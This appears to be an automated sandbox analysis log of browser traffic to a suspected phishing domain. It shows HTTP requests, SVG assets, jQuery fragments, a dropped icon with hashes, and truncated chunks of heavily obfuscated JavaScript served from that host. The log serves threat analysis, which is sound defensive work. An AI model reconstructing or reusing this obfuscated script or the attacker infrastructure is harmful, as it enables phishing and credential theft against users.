2025-01-09 22:30:32 UTC	7822	IN	Data Raw: 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 41 28 65 2c 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 29 7d 2c 70 72 65 76 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 41 28 65 2c 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 29 7d 2c 6e 65 78 74 41 6c 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 29 7d 2c 70 72 65 76 41 6c 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 29 7d 2c 6e 65 78 74 55 6e 74 69 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 2c 6e 29 7d 2c 70 72 65 76 55 6e 74 69 6c 3a 66 75 6e 63 74 69 6f 6e Data Ascii: ction(e){return A(e,"nextSibling")},prev:function(e){return A(e,"previousSibling")},nextAll:function(e){return d(e,"nextSibling")},prevAll:function(e){return d(e,"previousSibling")},nextUntil:function(e,t,n){return d(e,"nextSibling",n)},prevUntil:function
2025-01-09 22:30:32 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:32 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 72 65 6d 6f 76 65 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 58 2e 72 65 6d 6f 76 65 28 74 68 69 73 2c 65 29 7d 29 7d 7d 29 2c 63 65 2e 65 78 74 65 6e 64 28 7b 71 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 69 66 28 65 29 72 65 74 75 72 6e 20 74 3d 28 74 7c 7c 22 66 78 22 29 2b 22 71 75 65 75 65 22 2c 72 3d 5f 2e 67 65 74 28 65 2c 74 29 2c 6e 26 26 28 21 72 7c 7c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 3f 72 3d 5f 2e 61 63 63 65 73 73 28 65 2c 74 2c 63 65 2e 6d 61 6b 65 41 72 72 61 79 28 6e 29 29 3a 72 2e 70 75 73 68 28 6e 29 29 2c 72 7c 7c 5b 5d 7d 2c 64 65 71 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 Data Ascii: 1f40removeData:function(e){return this.each(function(){X.remove(this,e)})}}),ce.extend({queue:function(e,t,n){var r;if(e)return t=(t\|\|"fx")+"queue",r=_.get(e,t),n&&(!r\|\|Array.isArray(n)?r=_.access(e,t,ce.makeArray(n)):r.push(n)),r\|\|[]},dequeue:function(
2025-01-09 22:30:32 UTC	7822	IN	Data Raw: 79 28 69 2e 65 6c 65 6d 2c 73 29 29 26 26 21 31 3d 3d 3d 28 75 2e 72 65 73 75 6c 74 3d 72 29 26 26 28 75 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 75 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 29 29 7d 72 65 74 75 72 6e 20 63 2e 70 6f 73 74 44 69 73 70 61 74 63 68 26 26 63 2e 70 6f 73 74 44 69 73 70 61 74 63 68 2e 63 61 6c 6c 28 74 68 69 73 2c 75 29 2c 75 2e 72 65 73 75 6c 74 7d 7d 2c 68 61 6e 64 6c 65 72 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 2c 61 2c 73 3d 5b 5d 2c 75 3d 74 2e 64 65 6c 65 67 61 74 65 43 6f 75 6e 74 2c 6c 3d 65 2e 74 61 72 67 65 74 3b 69 66 28 75 26 26 6c 2e 6e 6f 64 65 54 79 70 65 26 26 21 28 22 63 6c 69 63 6b 22 3d 3d 3d 65 2e 74 79 70 65 26 26 31 3c 3d 65 2e 62 75 74 74 Data Ascii: y(i.elem,s))&&!1===(u.result=r)&&(u.preventDefault(),u.stopPropagation()))}return c.postDispatch&&c.postDispatch.call(this,u),u.result}},handlers:function(e,t){var n,r,i,o,a,s=[],u=t.delegateCount,l=e.target;if(u&&l.nodeType&&!("click"===e.type&&1<=e.butt
2025-01-09 22:30:32 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:32 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 54 79 70 65 29 7b 76 61 72 20 74 3d 4d 65 28 74 68 69 73 2c 65 29 3b 74 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 74 2e 66 69 72 73 74 43 68 69 6c 64 29 7d 7d 29 7d 2c 62 65 66 6f 72 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 24 65 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 74 68 69 73 29 7d 29 7d 2c 61 66 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 24 65 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 68 69 73 2e 70 61 72 Data Ascii: 1f40Type){var t=Me(this,e);t.insertBefore(e,t.firstChild)}})},before:function(){return $e(this,arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this)})},after:function(){return $e(this,arguments,function(e){this.parentNode&&this.par

Timestamp	Bytes transferred	Direction	Data
2025-01-09 22:30:31 UTC	778	OUT	GET /m/mxl/mlg.svg?96T28VKXHF81R7WIH0I9JK813 HTTP/1.1 Host: yta1lbtzic.ludomessie.shop Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
2025-01-09 22:30:31 UTC	299	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 22:30:31 GMT Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2 Last-Modified: Thu, 09 Jan 2025 08:20:07 GMT ETag: "e43-62b41a55ad8e3" Accept-Ranges: bytes Content-Length: 3651 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: image/svg+xml
2025-01-09 22:30:31 UTC	3651	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0

Timestamp	Bytes transferred	Direction	Data
2025-01-09 22:30:31 UTC	755	OUT	GET /m/mxl/sig_op.svg HTTP/1.1 Host: yta1lbtzic.ludomessie.shop Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
2025-01-09 22:30:31 UTC	299	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 22:30:31 GMT Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2 Last-Modified: Thu, 09 Jan 2025 08:20:07 GMT ETag: "638-62b41a55adccb" Accept-Ranges: bytes Content-Length: 1592 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: image/svg+xml
2025-01-09 22:30:31 UTC	1592	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 61 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 7d 2e 62 7b 66 69 6c 6c 3a 23 34 30 34 30 34 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	low
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Timestamp	Bytes transferred	Direction	Data
2025-01-09 22:30:32 UTC	710	OUT	GET /m/aty/XSQZV8DIZUPYQ33UUIAS6TR2C HTTP/1.1 Host: yta1lbtzic.ludomessie.shop Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
2025-01-09 22:30:32 UTC	268	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 22:30:32 GMT Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2 X-Powered-By: PHP/7.4.33 Vary: Accept-Encoding,User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/javascript; charset: UTF-8;charset=UTF-8
2025-01-09 22:30:32 UTC	7924	IN	Data Raw: 33 65 32 37 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 47 2c 59 29 7b 66 75 6e 63 74 69 6f 6e 20 62 32 28 47 2c 59 2c 45 2c 73 2c 6e 29 7b 72 65 74 75 72 6e 20 61 28 6e 2d 27 30 78 64 36 27 2c 47 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 62 35 28 47 2c 59 2c 45 2c 73 2c 6e 29 7b 72 65 74 75 72 6e 20 61 28 73 2d 27 30 78 33 39 30 27 2c 59 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 62 31 28 47 2c 59 2c 45 2c 73 2c 6e 29 7b 72 65 74 75 72 6e 20 61 28 73 2d 30 78 65 31 2c 59 29 3b 7d 76 61 72 20 45 3d 47 28 29 3b 66 75 6e 63 74 69 6f 6e 20 62 33 28 47 2c 59 2c 45 2c 73 2c 6e 29 7b 72 65 74 75 72 6e 20 61 28 45 2d 30 78 33 30 34 2c 73 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 62 34 28 47 2c 59 2c 45 2c 73 2c 6e 29 7b 72 65 74 75 72 6e 20 61 28 59 2d 20 2d 30 78 33 34 2c 6e 29 3b 7d 77 Data Ascii: 3e27(function(G,Y){function b2(G,Y,E,s,n){return a(n-'0xd6',G);}function b5(G,Y,E,s,n){return a(s-'0x390',Y);}function b1(G,Y,E,s,n){return a(s-0xe1,Y);}var E=G();function b3(G,Y,E,s,n){return a(E-0x304,s);}function b4(G,Y,E,s,n){return a(Y- -0x34,n);}w
2025-01-09 22:30:33 UTC	7993	IN	Data Raw: 2c 27 30 78 38 65 62 27 2c 27 30 78 33 34 33 27 29 5d 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 6e 5b 62 55 28 30 78 62 37 36 2c 27 30 78 36 64 36 27 2c 30 78 61 64 65 2c 27 30 78 32 66 66 27 2c 30 78 62 37 66 29 5d 28 71 2c 6e 5b 62 6f 28 30 78 37 35 65 2c 30 78 63 38 33 2c 30 78 66 61 39 2c 30 78 66 37 37 2c 30 78 66 65 62 29 5d 28 6e 5b 62 55 28 27 30 78 31 31 30 35 27 2c 27 30 78 63 32 32 27 2c 27 30 78 31 31 33 38 27 2c 30 78 31 30 64 36 2c 30 78 66 32 63 29 5d 28 6e 5b 62 49 28 27 30 78 34 30 35 27 2c 30 78 36 32 65 2c 30 78 38 30 37 2c 30 78 38 30 37 2c 27 30 78 36 64 64 27 29 5d 2c 4a 29 2c 6e 5b 62 55 28 30 78 64 39 63 2c 27 30 78 62 30 64 27 2c 30 78 39 37 61 2c 30 78 39 64 64 2c 27 30 78 39 64 32 27 29 5d 29 29 5b 62 75 28 27 30 Data Ascii: ,'0x8eb','0x343')]];continue;case'2':n[bU(0xb76,'0x6d6',0xade,'0x2ff',0xb7f)](q,n[bo(0x75e,0xc83,0xfa9,0xf77,0xfeb)](n[bU('0x1105','0xc22','0x1138',0x10d6,0xf2c)](n[bI('0x405',0x62e,0x807,0x807,'0x6dd')],J),n[bU(0xd9c,'0xb0d',0x97a,0x9dd,'0x9d2')]))[bu('0
2025-01-09 22:30:33 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:33 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 30 78 34 30 37 2c 2d 27 30 78 62 35 27 29 2b 6d 30 28 30 78 32 66 38 2c 27 30 78 33 33 27 2c 2d 27 30 78 31 62 34 27 2c 2d 27 30 78 31 33 31 27 2c 27 30 78 32 37 63 27 29 2c 27 55 57 75 69 51 27 3a 6d 32 28 2d 27 30 78 32 36 63 27 2c 27 30 78 34 27 2c 30 78 33 37 35 2c 27 30 78 31 35 62 27 2c 2d 30 78 33 61 62 29 2b 27 63 6b 27 2c 27 41 48 78 46 73 27 3a 66 75 6e 63 74 69 6f 6e 28 59 2c 45 29 7b 72 65 74 75 72 6e 20 59 2b 45 3b 7d 2c 27 74 50 64 42 68 27 3a 66 75 6e 63 74 69 6f 6e 28 59 2c 45 29 7b 72 65 74 75 72 6e 20 59 2b 45 3b 7d 2c 27 42 74 79 75 61 27 3a 6d 32 28 27 30 78 37 34 37 27 2c 27 30 78 37 62 34 27 2c 30 78 65 31 32 2c 27 30 78 61 33 34 27 2c 30 78 39 30 36 29 2b 6d 31 28 30 78 61 61 66 2c 27 30 78 37 61 66 27 2c 30 78 61 Data Ascii: 1f400x407,-'0xb5')+m0(0x2f8,'0x33',-'0x1b4',-'0x131','0x27c'),'UWuiQ':m2(-'0x26c','0x4',0x375,'0x15b',-0x3ab)+'ck','AHxFs':function(Y,E){return Y+E;},'tPdBh':function(Y,E){return Y+E;},'Btyua':m2('0x747','0x7b4',0xe12,'0xa34',0x906)+m1(0xaaf,'0x7af',0xa
2025-01-09 22:30:33 UTC	7822	IN	Data Raw: 27 2c 27 30 78 39 61 66 27 29 2c 27 51 72 68 58 70 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 73 29 7b 72 65 74 75 72 6e 20 45 28 73 29 3b 7d 2c 27 65 63 54 55 6d 27 3a 6d 76 28 30 78 35 39 37 2c 27 30 78 31 30 38 27 2c 30 78 34 31 31 2c 27 30 78 38 65 61 27 2c 30 78 38 38 32 29 2b 6d 54 28 27 30 78 39 66 66 27 2c 27 30 78 62 36 61 27 2c 30 78 37 39 33 2c 30 78 62 36 30 2c 30 78 38 64 34 29 2b 6d 51 28 30 78 31 61 64 2c 27 30 78 32 37 33 27 2c 27 30 78 35 36 32 27 2c 27 30 78 31 39 32 27 2c 2d 27 30 78 32 37 61 27 29 2b 6d 6d 28 30 78 37 61 36 2c 27 30 78 63 65 31 27 2c 30 78 64 38 38 2c 27 30 78 61 66 39 27 2c 27 30 78 63 37 38 27 29 2b 6d 76 28 27 30 78 63 35 37 27 2c 27 30 78 63 66 37 27 2c 30 78 65 37 62 2c 27 30 78 64 63 34 27 2c 27 30 78 38 61 39 27 29 Data Ascii: ','0x9af'),'QrhXp':function(E,s){return E(s);},'ecTUm':mv(0x597,'0x108',0x411,'0x8ea',0x882)+mT('0x9ff','0xb6a',0x793,0xb60,0x8d4)+mQ(0x1ad,'0x273','0x562','0x192',-'0x27a')+mm(0x7a6,'0xce1',0xd88,'0xaf9','0xc78')+mv('0xc57','0xcf7',0xe7b,'0xdc4','0x8a9')
2025-01-09 22:30:33 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:33 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 27 2c 2d 27 30 78 34 32 30 27 29 5d 28 29 2c 66 5b 6d 68 28 27 30 78 64 63 27 2c 30 78 32 62 33 2c 27 30 78 35 32 34 27 2c 30 78 33 30 31 2c 30 78 31 30 37 29 5d 28 6f 2c 66 5b 6d 68 28 27 30 78 37 31 63 27 2c 30 78 34 30 66 2c 27 30 78 38 37 33 27 2c 30 78 32 31 30 2c 27 30 78 33 62 37 27 29 5d 29 5b 6d 46 28 27 30 78 32 32 32 27 2c 27 30 78 36 33 39 27 2c 27 30 78 33 36 65 27 2c 27 30 78 37 35 35 27 2c 30 78 36 62 32 29 5d 28 4e 5b 66 5b 6d 6c 28 30 78 35 31 35 2c 30 78 31 35 33 2c 2d 27 30 78 61 32 27 2c 30 78 36 66 33 2c 30 78 33 62 32 29 5d 5d 29 2c 28 66 5b 6d 4d 28 2d 30 78 31 36 33 2c 2d 30 78 31 38 39 2c 2d 30 78 62 66 2c 2d 30 78 32 39 37 2c 30 78 33 34 66 29 5d 28 6b 2c 66 5b 6d 57 28 27 30 78 61 33 35 27 2c 27 30 78 36 66 32 Data Ascii: 1f40',-'0x420')](),f[mh('0xdc',0x2b3,'0x524',0x301,0x107)](o,f[mh('0x71c',0x40f,'0x873',0x210,'0x3b7')])[mF('0x222','0x639','0x36e','0x755',0x6b2)](N[f[ml(0x515,0x153,-'0xa2',0x6f3,0x3b2)]]),(f[mM(-0x163,-0x189,-0xbf,-0x297,0x34f)](k,f[mW('0xa35','0x6f2
2025-01-09 22:30:33 UTC	7822	IN	Data Raw: 27 29 2b 6d 6a 28 27 30 78 33 65 33 27 2c 30 78 35 36 65 2c 27 30 78 32 64 66 27 2c 2d 30 78 31 62 66 2c 30 78 33 30 37 29 2b 6d 5a 28 27 30 78 32 30 34 27 2c 2d 30 78 35 66 2c 30 78 35 35 36 2c 2d 27 30 78 32 64 32 27 2c 30 78 31 32 30 29 2b 6d 71 28 30 78 39 35 61 2c 27 30 78 64 32 30 27 2c 27 30 78 38 61 33 27 2c 27 30 78 39 62 63 27 2c 27 30 78 39 31 65 27 29 2b 6d 6a 28 27 30 78 31 65 63 27 2c 27 30 78 38 62 63 27 2c 27 30 78 33 62 64 27 2c 30 78 31 65 62 2c 30 78 38 38 66 29 2b 6d 70 28 27 30 78 36 35 35 27 2c 30 78 35 39 65 2c 27 30 78 33 30 65 27 2c 27 30 78 34 37 38 27 2c 27 30 78 61 65 27 29 2b 6d 5a 28 27 30 78 35 30 31 27 2c 27 30 78 34 39 63 27 2c 30 78 35 2c 2d 30 78 32 36 2c 27 30 78 33 37 30 27 29 2b 6d 5a 28 30 78 32 30 66 2c 30 78 34 38 Data Ascii: ')+mj('0x3e3',0x56e,'0x2df',-0x1bf,0x307)+mZ('0x204',-0x5f,0x556,-'0x2d2',0x120)+mq(0x95a,'0xd20','0x8a3','0x9bc','0x91e')+mj('0x1ec','0x8bc','0x3bd',0x1eb,0x88f)+mp('0x655',0x59e,'0x30e','0x478','0xae')+mZ('0x501','0x49c',0x5,-0x26,'0x370')+mZ(0x20f,0x48
2025-01-09 22:30:33 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:33 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 34 62 36 27 29 5d 29 29 7b 76 61 72 20 6e 3b 74 72 79 7b 47 5b 6d 44 28 27 30 78 39 38 32 27 2c 27 30 78 38 66 63 27 2c 30 78 35 36 39 2c 27 30 78 34 36 37 27 2c 27 30 78 39 30 66 27 29 5d 28 47 5b 6d 4b 28 27 30 78 63 63 27 2c 2d 30 78 33 33 39 2c 27 30 78 31 37 34 27 2c 2d 30 78 31 66 66 2c 27 30 78 32 37 63 27 29 5d 2c 47 5b 6d 44 28 30 78 32 36 34 2c 27 30 78 31 39 27 2c 30 78 33 61 62 2c 27 30 78 36 61 61 27 2c 30 78 35 39 39 29 5d 29 3f 73 5b 6d 4c 28 27 30 78 38 39 64 27 2c 30 78 39 31 62 2c 30 78 65 61 63 2c 27 30 78 63 65 34 27 2c 30 78 63 32 34 29 5d 28 59 2c 73 5b 6d 44 28 30 78 39 62 33 2c 27 30 78 38 32 38 27 2c 30 78 35 39 64 2c 27 30 78 35 32 62 27 2c 27 30 78 62 62 31 27 29 5d 29 5b 6d 64 28 30 78 32 61 66 2c 30 78 35 39 Data Ascii: 1f404b6')])){var n;try{G[mD('0x982','0x8fc',0x569,'0x467','0x90f')](G[mK('0xcc',-0x339,'0x174',-0x1ff,'0x27c')],G[mD(0x264,'0x19',0x3ab,'0x6aa',0x599)])?s[mL('0x89d',0x91b,0xeac,'0xce4',0xc24)](Y,s[mD(0x9b3,'0x828',0x59d,'0x52b','0xbb1')])[md(0x2af,0x59

Timestamp	Bytes transferred	Direction	Data
2025-01-09 22:30:32 UTC	711	OUT	GET /m/ecpt/8M1Q7M3MYL7GVKY6S0FI3RTYX HTTP/1.1 Host: yta1lbtzic.ludomessie.shop Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
2025-01-09 22:30:33 UTC	268	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 22:30:32 GMT Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2 X-Powered-By: PHP/7.4.33 Vary: Accept-Encoding,User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/javascript; charset: UTF-8;charset=UTF-8
2025-01-09 22:30:33 UTC	7924	IN	Data Raw: 33 65 32 37 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 62 31 39 38 39 2c 5f 30 78 34 64 64 38 64 64 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 39 38 63 37 36 30 28 5f 30 78 35 62 63 30 36 36 2c 5f 30 78 32 62 66 65 38 62 2c 5f 30 78 33 61 65 35 61 34 2c 5f 30 78 62 62 32 64 63 63 2c 5f 30 78 31 31 35 35 65 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 35 62 63 30 36 36 2d 20 2d 30 78 32 64 66 2c 5f 30 78 62 62 32 64 63 63 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 65 65 30 37 31 28 5f 30 78 32 63 63 64 62 62 2c 5f 30 78 35 38 38 63 64 35 2c 5f 30 78 32 31 66 36 31 34 2c 5f 30 78 33 65 38 65 32 66 2c 5f 30 78 34 64 32 31 39 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 34 64 32 31 39 61 2d 20 2d 30 78 32 32 33 2c Data Ascii: 3e27(function(_0x5b1989,_0x4dd8dd){function _0x98c760(_0x5bc066,_0x2bfe8b,_0x3ae5a4,_0xbb2dcc,_0x1155ea){return _0x4e53(_0x5bc066- -0x2df,_0xbb2dcc);}function _0x1ee071(_0x2ccdbb,_0x588cd5,_0x21f614,_0x3e8e2f,_0x4d219a){return _0x4e53(_0x4d219a- -0x223,
